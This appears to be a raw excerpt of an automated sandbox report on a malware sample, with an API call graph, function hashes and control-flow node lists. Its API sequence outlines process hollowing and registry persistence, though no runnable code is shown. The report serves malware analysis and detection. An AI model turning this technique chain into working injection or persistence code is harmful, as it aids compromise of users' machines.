60e18b9 Wow64SetThreadContext 54701->54702 54704 60e1931 54702->54704 54704->54638 54706 6212c89 54705->54706 54715 60e1dc9 54706->54715 54719 60e1dd0 54706->54719 54707 6212cbf 54707->54643 54711 6212c9d 54710->54711 54713 60e1dc9 VirtualAllocEx 54711->54713 54714 60e1dd0 VirtualAllocEx 54711->54714 54712 6212cbf 54712->54643 54713->54712 54714->54712 54716 60e1dd0 VirtualAllocEx 54715->54716 54718 60e1e8c 54716->54718 54718->54707 54720 60e1e14 VirtualAllocEx 54719->54720 54722 60e1e8c 54720->54722 54722->54707 54724 62115b7 54723->54724 54725 62115d9 54724->54725 54733 6211a71 54724->54733 54738 6211a15 54724->54738 54725->54648 54729 62115b7 54728->54729 54730 62115d9 54729->54730 54731 6211a71 2 API calls 54729->54731 54732 6211a15 2 API calls 54729->54732 54730->54648 54731->54730 54732->54730 54734 6211a96 54733->54734 54743 60e14ac 54734->54743 54747 60e14b8 54734->54747 54739 6211a1e 54738->54739 54741 60e14ac CreateProcessA 54739->54741 54742 60e14b8 CreateProcessA 54739->54742 54740 6211c9a 54741->54740 54742->54740 54744 60e14b8 CreateProcessA 54743->54744 54746 60e1734 54744->54746 54748 60e1538 CreateProcessA 54747->54748 54750 60e1734 54748->54750 54752 60e2191 NtResumeThread 54751->54752 54754 60e21e8 54752->54754 54754->54652 54756 60e2191 NtResumeThread 54755->54756 54758 60e21e8 54756->54758 54758->54652 54760 6212e1d 54759->54760 54762 60e1868 Wow64SetThreadContext 54760->54762 54763 60e1870 Wow64SetThreadContext 54760->54763 54761 6212e36 54761->54657 54762->54761 54763->54761 54765 6212e1d 54764->54765 54767 60e1868 Wow64SetThreadContext 54765->54767 54768 60e1870 Wow64SetThreadContext 54765->54768 54766 6212e36 54766->54657 54767->54766 54768->54766 54274 1974830 54275 197484a 54274->54275 54276 197485a 54275->54276 54281 60c756c 54275->54281 54284 60c4e70 54275->54284 54288 60c3d40 54275->54288 54292 60c26bb 54275->54292 54295 60cd2f8 54281->54295 54285 60c4e8f 54284->54285 54287 60cd2f8 VirtualProtect 54285->54287 54286 60c4eba 54287->54286 54289 60c3d5f 54288->54289 54291 60cd2f8 VirtualProtect 54289->54291 54290 60c01d8 54291->54290 54294 60cd2f8 VirtualProtect 54292->54294 54293 60c01d8 54294->54293 54297 60cd31f 54295->54297 54299 60cd7f8 54297->54299 54300 60cd841 VirtualProtect 54299->54300 54302 60c01d8 54300->54302 54769 164d01c 54770 164d034 54769->54770 54771 164d08f 54770->54771 54773 60cdee0 54770->54773 54774 60cdf39 54773->54774 54777 60ce470 54774->54777 54775 60cdf6e 54778 60ce49d 54777->54778 54779 60cd2f8 VirtualProtect 54778->54779 54781 60ce633 54778->54781 54780 60ce624 54779->54780 54780->54775 54781->54775 54523 60ce9c0 54524 60cea04 VirtualAlloc 54523->54524 54526 60cea71 54524->54526 54303 60e8ea0 54304 60e8eb5 54303->54304 54325 60eab4e 54304->54325 54334 60ea671 54304->54334 54343 60ea2b0 54304->54343 54352 60eaa53 54304->54352 54361 60ead73 54304->54361 54370 60ea633 54304->54370 54379 60ea552 54304->54379 54388 60e9c15 54304->54388 54397 60ea5b7 54304->54397 54406 60e9818 54304->54406 54415 60ea5fb 54304->54415 54424 60e997a 54304->54424 54436 60ea200 54304->54436 54445 60ea2c2 54304->54445 54454 60eab84 54304->54454 54459 60eab68 54304->54459 54468 60eae6b 54304->54468 54477 60e980a 54304->54477 54486 60e9bad 54304->54486 54305 60e8ecb 54327 60e988a 54325->54327 54326 60e98be 54326->54305 54327->54326 54328 60e9973 54327->54328 54495 60e3c9c 54327->54495 54499 60e3ca8 54327->54499 54329 60eace7 54328->54329 54503 60e417c 54328->54503 54507 60e4188 54328->54507 54329->54329 54337 60e988a 54334->54337 54335 60e98be 54335->54305 54336 60e9973 54338 60eace7 54336->54338 54341 60e417c RegSetValueExA 54336->54341 54342 60e4188 RegSetValueExA 54336->54342 54337->54335 54337->54336 54339 60e3c9c CopyFileA 54337->54339 54340 60e3ca8 CopyFileA 54337->54340 54338->54338 54339->54337 54340->54337 54341->54336 54342->54336 54345 60e988a 54343->54345 54344 60e98be 54344->54305 54345->54344 54346 60e9973 54345->54346 54348 60e3c9c CopyFileA 54345->54348 54349 60e3ca8 CopyFileA 54345->54349 54347 60eace7 54346->54347 54350 60e417c RegSetValueExA 54346->54350 54351 60e4188 RegSetValueExA 54346->54351 54347->54347 54348->54345 54349->54345 54350->54346 54351->54346 54356 60e988a 54352->54356 54353 60e9973 54354 60eace7 54353->54354 54357 60e417c RegSetValueExA 54353->54357 54358 60e4188 RegSetValueExA 54353->54358 54354->54354 54355 60e98be 54355->54305 54356->54353 54356->54355 54359 60e3c9c CopyFileA 54356->54359 54360 60e3ca8 CopyFileA 54356->54360 54357->54353 54358->54353 54359->54356 54360->54356 54363 60e988a 54361->54363 54362 60e98be 54362->54305 54363->54362 54364 60e9973 54363->54364 54366 60e3c9c CopyFileA 54363->54366 54367 60e3ca8 CopyFileA 54363->54367 54365 60eace7 54364->54365 54368 60e417c RegSetValueExA 54364->54368 54369 60e4188 RegSetValueExA 54364->54369 54365->54365 54366->54363 54367->54363 54368->54364 54369->54364 54372 60e988a 54370->54372 54371 60e98be 54371->54305 54372->54371 54373 60e9973 54372->54373 54375 60e3c9c CopyFileA 54372->54375 54376 60e3ca8 CopyFileA 54372->54376 54374 60eace7 54373->54374 54377 60e417c RegSetValueExA 54373->54377 54378 60e4188 RegSetValueExA 54373->54378 54374->54374 54375->54372 54376->54372 54377->54373 54378->54373 54381 60e988a 54379->54381 54380 60e98be 54380->54305 54381->54380 54382 60e9973 54381->54382 54384 60e3c9c CopyFileA 54381->54384 54385 60e3ca8 CopyFileA 54381->54385 54383 60eace7 54382->54383 54386 60e417c RegSetValueExA 54382->54386 54387 60e4188 RegSetValueExA 54382->54387 54383->54383 54384->54381 54385->54381 54386->54382 54387->54382 54390 60e988a 54388->54390 54389 60e98be 54389->54305 54390->54388 54390->54389 54391 60e9973 54390->54391 54393 60e3c9c CopyFileA 54390->54393 54394 60e3ca8 CopyFileA 54390->54394 54392 60eace7 54391->54392 54395 60e417c RegSetValueExA 54391->54395 54396 60e4188 RegSetValueExA 54391->54396 54392->54392 54393->54390 54394->54390 54395->54391 54396->54391 54400 60e988a 54397->54400 54398 60e9973 54401 60eace7 54398->54401 54404 60e417c RegSetValueExA 54398->54404 54405 60e4188 RegSetValueExA 54398->54405 54399 60e98be 54399->54305 54400->54398 54400->54399 54402 60e3c9c CopyFileA 54400->54402 54403 60e3ca8 CopyFileA 54400->54403 54401->54401 54402->54400 54403->54400 54404->54398 54405->54398 54408 60e9831 54406->54408 54407 60e98be 54407->54305 54408->54407 54409 60e9973 54408->54409 54411 60e3c9c CopyFileA 54408->54411 54412 60e3ca8 CopyFileA 54408->54412 54410 60eace7 54409->54410 54413 60e417c RegSetValueExA 54409->54413 54414 60e4188 RegSetValueExA 54409->54414 54410->54410 54411->54408 54412->54408 54413->54409 54414->54409 54417 60e988a 54415->54417 54416 60e98be 54416->54305 54417->54416 54418 60e9973 54417->54418 54420 60e3c9c CopyFileA 54417->54420 54421 60e3ca8 CopyFileA 54417->54421 54419 60eace7 54418->54419 54422 60e417c RegSetValueExA 54418->54422 54423 60e4188 RegSetValueExA 54418->54423 54419->54419 54420->54417 54421->54417 54422->54418 54423->54418 54425 60e99b3 54424->54425 54511 60e3f45 54425->54511 54515 60e3f50 54425->54515 54438 60e988a 54436->54438 54437 60e98be 54437->54305 54438->54437 54439 60e9973 54438->54439 54441 60e3c9c CopyFileA 54438->54441 54442 60e3ca8 CopyFileA 54438->54442 54440 60eace7 54439->54440 54443 60e417c RegSetValueExA 54439->54443 54444 60e4188 RegSetValueExA 54439->54444 54440->54440 54441->54438 54442->54438 54443->54439 54444->54439 54446 60e988a 54445->54446 54447 60e98be 54446->54447 54448 60e9973 54446->54448 54450 60e3c9c CopyFileA 54446->54450 54451 60e3ca8 CopyFileA 54446->54451 54447->54305 54449 60eace7 54448->54449 54452 60e417c RegSetValueExA 54448->54452 54453 60e4188 RegSetValueExA 54448->54453 54449->54449 54450->54446 54451->54446 54452->54448 54453->54448 54455 60eab8a 54454->54455 54456 60eace7 54455->54456 54457 60e417c RegSetValueExA 54455->54457 54458 60e4188 RegSetValueExA 54455->54458 54456->54456 54457->54455 54458->54455 54461 60e988a 54459->54461 54460 60e98be 54460->54305 54461->54460 54462 60e9973 54461->54462 54464 60e3c9c CopyFileA 54461->54464 54465 60e3ca8 CopyFileA 54461->54465 54463 60eace7 54462->54463 54466 60e417c RegSetValueExA 54462->54466 54467 60e4188 RegSetValueExA 54462->54467 54463->54463 54464->54461 54465->54461 54466->54462 54467->54462 54470 60e988a 54468->54470 54469 60e98be 54469->54305 54470->54469 54471 60e9973 54470->54471 54473 60e3c9c CopyFileA 54470->54473 54474 60e3ca8 CopyFileA 54470->54474 54472 60eace7 54471->54472 54475 60e417c RegSetValueExA 54471->54475 54476 60e4188 RegSetValueExA 54471->54476 54472->54472 54473->54470 54474->54470 54475->54471 54476->54471 54479 60e9806 54477->54479 54478 60e98be 54478->54305 54479->54477 54479->54478 54480 60e9973 54479->54480 54482 60e3c9c CopyFileA 54479->54482 54483 60e3ca8 CopyFileA 54479->54483 54481 60eace7 54480->54481 54484 60e417c RegSetValueExA 54480->54484 54485 60e4188 RegSetValueExA 54480->54485 54481->54481 54482->54479 54483->54479 54484->54480 54485->54480 54488 60e988a 54486->54488 54487 60e98be 54487->54305 54488->54487 54489 60e9973 54488->54489 54491 60e3c9c CopyFileA 54488->54491 54492 60e3ca8 CopyFileA 54488->54492 54490 60eace7 54489->54490 54493 60e417c RegSetValueExA 54489->54493 54494 60e4188 RegSetValueExA 54489->54494 54490->54490 54491->54488 54492->54488 54493->54489 54494->54489 54496 60e3d04 CopyFileA 54495->54496 54498 60e3e35 54496->54498 54500 60e3d04 CopyFileA 54499->54500 54502 60e3e35 54500->54502 54505 60e41ed RegSetValueExA 54503->54505 54506 60e42fa 54505->54506 54508 60e41ed RegSetValueExA 54507->54508 54510 60e42fa 54508->54510 54513 60e3faf RegOpenKeyExA 54511->54513 54514 60e408a 54513->54514 54516 60e3faf RegOpenKeyExA 54515->54516 54518 60e408a 54516->54518

                                                                Executed Functions

                                                                Function 060B3260 Relevance: 16.2, Strings: 12, Instructions: 1150COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                • API String ID: 0-312445597
                                                                • Opcode ID: 514441f93f7dc23a52ee001db7e07a24f5650e895d1345e9b0d25c5426cef88b
                                                                • Instruction ID: 4aea2ae2279d91a5cbd4eff574058f1db1efa87cdfaa1cb2ada58e709fb16fd9
                                                                • Opcode Fuzzy Hash: 514441f93f7dc23a52ee001db7e07a24f5650e895d1345e9b0d25c5426cef88b
                                                                • Instruction Fuzzy Hash: 3CB20A34A402289FDB58CFA4C894BADBBF6FB48700F248599E505AB3A5CB71ED45CF50
                                                                Function 060B3597 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,bq$4$$^q$$^q$$^q$$^q
                                                                • API String ID: 0-2546334966
                                                                • Opcode ID: 7d4adb038268f1be6c3b96cd0324f2cf8484f846f198e851e3e2b34a8822c087
                                                                • Instruction ID: a3ec786defd12ca36d4a25dc9643f0c8b7cabc8502400dec969f6788f40dbc63
                                                                • Opcode Fuzzy Hash: 7d4adb038268f1be6c3b96cd0324f2cf8484f846f198e851e3e2b34a8822c087
                                                                • Instruction Fuzzy Hash: 7C22F934A40228CFDBA8CF64C994BADBBB6FF48300F149099D509AB3A5DB719D85CF50
                                                                Function 01978A90 Relevance: 6.0, Strings: 4, Instructions: 983COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 704 1978a90-1978ab1 705 1978ab3 704->705 706 1978ab8-1978b9f 704->706 705->706 708 1978ba5-1978ce6 call 1975308 706->708 709 19792a1-19792c9 706->709 755 1978cec-1978d47 708->755 756 197926a-1979294 708->756 712 19799cf-19799d8 709->712 714 19792d7-19792e1 712->714 715 19799de-19799f5 712->715 716 19792e3 714->716 717 19792e8-19793dc call 1975308 714->717 716->717 738 1979406 717->738 739 19793de-19793ea 717->739 740 197940c-197942c 738->740 741 19793f4-19793fa 739->741 742 19793ec-19793f2 739->742 746 197942e-1979487 740->746 747 197948c-197950c 740->747 744 1979404 741->744 742->744 744->740 759 19799cc 746->759 767 1979563-19795a6 call 1975308 747->767 768 197950e-1979561 747->768 762 1978d4c-1978d57 755->762 763 1978d49 755->763 769 1979296 756->769 770 197929e 756->770 759->712 766 197917f-1979185 762->766 763->762 771 1978d5c-1978d7a 766->771 772 197918b-1979207 call 1974204 766->772 793 19795b1-19795ba 767->793 768->793 769->770 770->709 774 1978dd1-1978de6 771->774 775 1978d7c-1978d80 771->775 812 1979254-197925a 772->812 780 1978ded-1978e03 774->780 781 1978de8 774->781 775->774 778 1978d82-1978d8d 775->778 784 1978dc3-1978dc9 778->784 782 1978e05 780->782 783 1978e0a-1978e21 780->783 781->780 782->783 788 1978e23 783->788 789 1978e28-1978e3e 783->789 790 1978d8f-1978d93 784->790 791 1978dcb-1978dcc 784->791 788->789 796 1978e45-1978e4c 789->796 797 1978e40 789->797 794 1978d95 790->794 795 1978d99-1978db1 790->795 799 1978e4f-1978eba 791->799 800 197961a-1979629 793->800 794->795 801 1978db3 795->801 802 1978db8-1978dc0 795->802 796->799 797->796 803 1978ece-1979083 799->803 804 1978ebc-1978ec8 799->804 806 19795bc-19795e4 800->806 807 197962b-19796b3 800->807 801->802 802->784 814 19790e7-19790fc 803->814 815 1979085-1979089 803->815 804->803 809 19795e6 806->809 810 19795eb-1979614 806->810 842 197982c-1979838 807->842 809->810 810->800 818 197925c-1979262 812->818 819 1979209-1979251 812->819 820 1979103-1979124 814->820 821 19790fe 814->821 815->814 816 197908b-197909a 815->816 822 19790d9-19790df 816->822 818->756 819->812 823 1979126 820->823 824 197912b-197914a 820->824 821->820 829 19790e1-19790e2 822->829 830 197909c-19790a0 822->830 823->824 826 1979151-1979171 824->826 827 197914c 824->827 835 1979173 826->835 836 1979178 826->836 827->826 837 197917c 829->837 833 19790a2-19790a6 830->833 834 19790aa-19790cb 830->834 833->834 838 19790d2-19790d6 834->838 839 19790cd 834->839 835->836 836->837 837->766 838->822 839->838 844 197983e-1979899 842->844 845 19796b8-19796c1 842->845 860 19798d0-19798fa 844->860 861 197989b-19798ce 844->861 846 19796c3 845->846 847 19796ca-1979820 845->847 846->847 849 1979715-1979755 846->849 850 19796d0-1979710 846->850 851 197979f-19797df 846->851 852 197975a-197979a 846->852 865 1979826 847->865 849->865 850->865 851->865 852->865 869 1979903-1979996 860->869 861->869 865->842 873 197999d-19799bd 869->873 873->759
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: TJcq$Te^q$pbq$xbaq
                                                                • API String ID: 0-1954897716
                                                                • Opcode ID: 90b6fcbd5af3ec3bb611a31905f5fec76c0c7c8d5430416adbac5fdb0b804b2b
                                                                • Instruction ID: 391a636a09098f5019a15989e0bd221edad07eab3a9ffa5194c685c26ee1bc4e
                                                                • Opcode Fuzzy Hash: 90b6fcbd5af3ec3bb611a31905f5fec76c0c7c8d5430416adbac5fdb0b804b2b
                                                                • Instruction Fuzzy Hash: 3EA2B375A00228CFDB65CF69C984A99BBB2FF89314F1581E9D50DAB325DB319E81CF40
                                                                Function 01970E60 Relevance: 3.1, Strings: 2, Instructions: 603COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1378 1970e60-1970ed7 1380 1970ede-1970ef6 1378->1380 1381 1970ed9 1378->1381 1383 19714b7-19714d2 1380->1383 1384 1970efc-19710c4 1380->1384 1381->1380 1387 1971558-197159f 1383->1387 1388 19714d8-19714f8 1383->1388 1446 19710c6-19710fc 1384->1446 1447 19710fe-1971100 1384->1447 1400 19715b1-19715b9 1387->1400 1401 19715a1-19715ac 1387->1401 1392 1971796 1388->1392 1393 19714fe-1971506 1388->1393 1399 197179b-19717a4 1392->1399 1393->1392 1395 197150c-1971523 1393->1395 1395->1392 1398 1971529-1971553 call 1970170 1395->1398 1398->1399 1403 19717a6 1399->1403 1404 19717b1 1399->1404 1406 19715de 1400->1406 1407 19715bb-19715dc 1400->1407 1405 1971654-197169a 1401->1405 1403->1404 1415 19717b2 1404->1415 1417 19716a0-19716cc 1405->1417 1418 197172b-1971794 1405->1418 1409 19715e5-19715e7 1406->1409 1407->1409 1412 19715f3-1971613 1409->1412 1413 19715e9-19715f1 1409->1413 1412->1405 1422 1971615-197161e 1412->1422 1413->1405 1415->1415 1417->1392 1425 19716d2-19716d9 1417->1425 1418->1399 1422->1392 1424 1971624-1971652 1422->1424 1424->1405 1424->1422 1425->1392 1426 19716df-19716eb 1425->1426 1426->1392 1428 19716f1-19716fd 1426->1428 1428->1392 1429 1971703-1971729 1428->1429 1429->1399 1446->1447 1448 1971106-1971110 1447->1448 1449 1971102-1971104 1447->1449 1450 1971112-197112a 1448->1450 1449->1450 1452 1971130-1971138 1450->1452 1453 197112c-197112e 1450->1453 1455 197113a-197113f 1452->1455 1453->1455 1457 1971152-1971180 1455->1457 1458 1971141-197114c 1455->1458 1462 1971182-197118f 1457->1462 1463 19711b9-19711c3 1457->1463 1458->1457 1462->1463 1468 1971191-197119e 1462->1468 1464 19711c5 1463->1464 1465 19711cc-1971253 1463->1465 1464->1465 1477 1971297-19712a5 1465->1477 1478 1971255-1971295 1465->1478 1471 19711a4-19711b3 1468->1471 1472 19711a0-19711a2 1468->1472 1471->1463 1472->1463 1481 19712b0-19712f2 call 1972db2 1477->1481 1478->1481 1485 19712f8-19713c1 1481->1485 1490 19713c3-19713ed 1485->1490 1491 19713ef-197140b 1485->1491 1490->1491 1494 197140d 1491->1494 1495 1971419 1491->1495 1494->1495 1497 197141a 1495->1497 1497->1497
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q$\s^q
                                                                • API String ID: 0-2586804783
                                                                • Opcode ID: f33187fba3b81d62227c039d0a16d6095221e4d661a222f46fb164ea2bec20ec
                                                                • Instruction ID: 2d76f41f9743311c09938672829295e53128b5ff1c587d195e7f6abb3a1f75a0
                                                                • Opcode Fuzzy Hash: f33187fba3b81d62227c039d0a16d6095221e4d661a222f46fb164ea2bec20ec
                                                                • Instruction Fuzzy Hash: 2B327D75E012298FEB24CF79D884AADB7F2BF88305F15C569E40AAB354DB349941CF90
                                                                Function 060AD770 Relevance: 3.0, Strings: 2, Instructions: 542COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1740 60ad770-60ad791 1741 60ad798-60ad830 call 60ae0a0 1740->1741 1742 60ad793 1740->1742 1746 60ad836-60ad86d 1741->1746 1742->1741 1748 60ad86f-60ad87a 1746->1748 1749 60ad87c 1746->1749 1750 60ad886-60ad958 1748->1750 1749->1750 1759 60ad96a-60ad995 1750->1759 1760 60ad95a-60ad960 1750->1760 1761 60ae002-60ae01e 1759->1761 1760->1759 1762 60ad99a-60adac3 1761->1762 1763 60ae024-60ae03f 1761->1763 1772 60adad5-60adc24 1762->1772 1773 60adac5-60adacb 1762->1773 1781 60adc7d-60adc84 1772->1781 1782 60adc26-60adc2a 1772->1782 1773->1772 1783 60ade2f-60ade4b 1781->1783 1784 60adc2c-60adc2d 1782->1784 1785 60adc32-60adc78 1782->1785 1786 60adc89-60add77 1783->1786 1787 60ade51-60ade75 1783->1787 1788 60adebf-60adf0e 1784->1788 1785->1788 1812 60ade2b-60ade2c 1786->1812 1813 60add7d-60ade28 1786->1813 1794 60adebc-60adebd 1787->1794 1795 60ade77-60adeb9 1787->1795 1802 60adf20-60adf6b 1788->1802 1803 60adf10-60adf16 1788->1803 1794->1788 1795->1794 1805 60adf6d-60adfe3 1802->1805 1806 60adfe4-60adfff 1802->1806 1803->1802 1805->1806 1806->1761 1812->1783 1813->1812
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: fcq$8
                                                                • API String ID: 0-89531850
                                                                • Opcode ID: bdb31790c262cda3a74fbeadfe2fa8a0e1484675ff06030b61f93c14fb7e368a
                                                                • Instruction ID: 4bb14df642ea7c29f0b1b4ea590ff38fdd6909389d979491663b80fbc0de01d4
                                                                • Opcode Fuzzy Hash: bdb31790c262cda3a74fbeadfe2fa8a0e1484675ff06030b61f93c14fb7e368a
                                                                • Instruction Fuzzy Hash: F942A575D006298BDB64DF69C850ADDB7B2BF89310F1486EAD40DA7251EB30AE85CF90
                                                                Function 01970E52 Relevance: 2.9, Strings: 2, Instructions: 395COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1820 1970e52-1970e55 1821 1970e57-1970ed7 1820->1821 1822 1970def-1970dfd 1820->1822 1825 1970ede-1970ef6 1821->1825 1826 1970ed9 1821->1826 1828 19714b7-19714d2 1825->1828 1829 1970efc-19710c4 1825->1829 1826->1825 1832 1971558-197159f 1828->1832 1833 19714d8-19714f8 1828->1833 1891 19710c6-19710fc 1829->1891 1892 19710fe-1971100 1829->1892 1845 19715b1-19715b9 1832->1845 1846 19715a1-19715ac 1832->1846 1837 1971796 1833->1837 1838 19714fe-1971506 1833->1838 1844 197179b-19717a4 1837->1844 1838->1837 1840 197150c-1971523 1838->1840 1840->1837 1843 1971529-1971553 call 1970170 1840->1843 1843->1844 1848 19717a6 1844->1848 1849 19717b1 1844->1849 1851 19715de 1845->1851 1852 19715bb-19715dc 1845->1852 1850 1971654-197169a 1846->1850 1848->1849 1860 19717b2 1849->1860 1862 19716a0-19716cc 1850->1862 1863 197172b-1971794 1850->1863 1854 19715e5-19715e7 1851->1854 1852->1854 1857 19715f3-1971613 1854->1857 1858 19715e9-19715f1 1854->1858 1857->1850 1867 1971615-197161e 1857->1867 1858->1850 1860->1860 1862->1837 1870 19716d2-19716d9 1862->1870 1863->1844 1867->1837 1869 1971624-1971652 1867->1869 1869->1850 1869->1867 1870->1837 1871 19716df-19716eb 1870->1871 1871->1837 1873 19716f1-19716fd 1871->1873 1873->1837 1874 1971703-1971729 1873->1874 1874->1844 1891->1892 1893 1971106-1971110 1892->1893 1894 1971102-1971104 1892->1894 1895 1971112-197112a 1893->1895 1894->1895 1897 1971130-1971138 1895->1897 1898 197112c-197112e 1895->1898 1900 197113a-197113f 1897->1900 1898->1900 1902 1971152-1971180 1900->1902 1903 1971141-197114c 1900->1903 1907 1971182-197118f 1902->1907 1908 19711b9-19711c3 1902->1908 1903->1902 1907->1908 1913 1971191-197119e 1907->1913 1909 19711c5 1908->1909 1910 19711cc-1971253 1908->1910 1909->1910 1922 1971297-19712a5 1910->1922 1923 1971255-1971295 1910->1923 1916 19711a4-19711b3 1913->1916 1917 19711a0-19711a2 1913->1917 1916->1908 1917->1908 1926 19712b0-19712f2 call 1972db2 1922->1926 1923->1926 1930 19712f8-19713c1 1926->1930 1935 19713c3-19713ed 1930->1935 1936 19713ef-197140b 1930->1936 1935->1936 1939 197140d 1936->1939 1940 1971419 1936->1940 1939->1940 1942 197141a 1940->1942 1942->1942
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q$\s^q
                                                                • API String ID: 0-2586804783
                                                                • Opcode ID: df643be356e95528360c8edcf53033e4604593f669d4e34cd9f01b262b315781
                                                                • Instruction ID: e6b9cdaedeabe100a936c8297e1a6cbc4a11f9294e19e3b1342d9c7f028d52d4
                                                                • Opcode Fuzzy Hash: df643be356e95528360c8edcf53033e4604593f669d4e34cd9f01b262b315781
                                                                • Instruction Fuzzy Hash: 31E17E75E012298FEB24CF7ADC85AADB7F2BFC8305F058569D409AB354DB349942CB90
                                                                Function 01970E9A Relevance: 2.9, Strings: 2, Instructions: 377COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1944 1970e9a-1970eb0 1946 1970eb2-1970ebc 1944->1946 1947 1970ebd-1970ed7 1944->1947 1948 1970ede-1970ef6 1947->1948 1949 1970ed9 1947->1949 1951 19714b7-19714d2 1948->1951 1952 1970efc-19710c4 1948->1952 1949->1948 1955 1971558-197159f 1951->1955 1956 19714d8-19714f8 1951->1956 2014 19710c6-19710fc 1952->2014 2015 19710fe-1971100 1952->2015 1968 19715b1-19715b9 1955->1968 1969 19715a1-19715ac 1955->1969 1960 1971796 1956->1960 1961 19714fe-1971506 1956->1961 1967 197179b-19717a4 1960->1967 1961->1960 1963 197150c-1971523 1961->1963 1963->1960 1966 1971529-1971553 call 1970170 1963->1966 1966->1967 1971 19717a6 1967->1971 1972 19717b1 1967->1972 1974 19715de 1968->1974 1975 19715bb-19715dc 1968->1975 1973 1971654-197169a 1969->1973 1971->1972 1983 19717b2 1972->1983 1985 19716a0-19716cc 1973->1985 1986 197172b-1971794 1973->1986 1977 19715e5-19715e7 1974->1977 1975->1977 1980 19715f3-1971613 1977->1980 1981 19715e9-19715f1 1977->1981 1980->1973 1990 1971615-197161e 1980->1990 1981->1973 1983->1983 1985->1960 1993 19716d2-19716d9 1985->1993 1986->1967 1990->1960 1992 1971624-1971652 1990->1992 1992->1973 1992->1990 1993->1960 1994 19716df-19716eb 1993->1994 1994->1960 1996 19716f1-19716fd 1994->1996 1996->1960 1997 1971703-1971729 1996->1997 1997->1967 2014->2015 2016 1971106-1971110 2015->2016 2017 1971102-1971104 2015->2017 2018 1971112-197112a 2016->2018 2017->2018 2020 1971130-1971138 2018->2020 2021 197112c-197112e 2018->2021 2023 197113a-197113f 2020->2023 2021->2023 2025 1971152-1971180 2023->2025 2026 1971141-197114c 2023->2026 2030 1971182-197118f 2025->2030 2031 19711b9-19711c3 2025->2031 2026->2025 2030->2031 2036 1971191-197119e 2030->2036 2032 19711c5 2031->2032 2033 19711cc-1971253 2031->2033 2032->2033 2045 1971297-19712a5 2033->2045 2046 1971255-1971295 2033->2046 2039 19711a4-19711b3 2036->2039 2040 19711a0-19711a2 2036->2040 2039->2031 2040->2031 2049 19712b0-19712f2 call 1972db2 2045->2049 2046->2049 2053 19712f8-19713c1 2049->2053 2058 19713c3-19713ed 2053->2058 2059 19713ef-197140b 2053->2059 2058->2059 2062 197140d 2059->2062 2063 1971419 2059->2063 2062->2063 2065 197141a 2063->2065 2065->2065
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q$\s^q
                                                                • API String ID: 0-2586804783
                                                                • Opcode ID: 994aa304405134f644bf66529fc6815b8fc04d5835545a149028d0c7ccbac077
                                                                • Instruction ID: b0176ce8ab214249b3769c5a08eb2fd6f431dfea2ba2bdb10bbfafa8423cb6ab
                                                                • Opcode Fuzzy Hash: 994aa304405134f644bf66529fc6815b8fc04d5835545a149028d0c7ccbac077
                                                                • Instruction Fuzzy Hash: 53E17D35E012298FEB24CF79DC85AADB7F2BFC8305F158669D409AB354DB349942CB90
                                                                Function 01970F11 Relevance: 2.8, Strings: 2, Instructions: 349COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
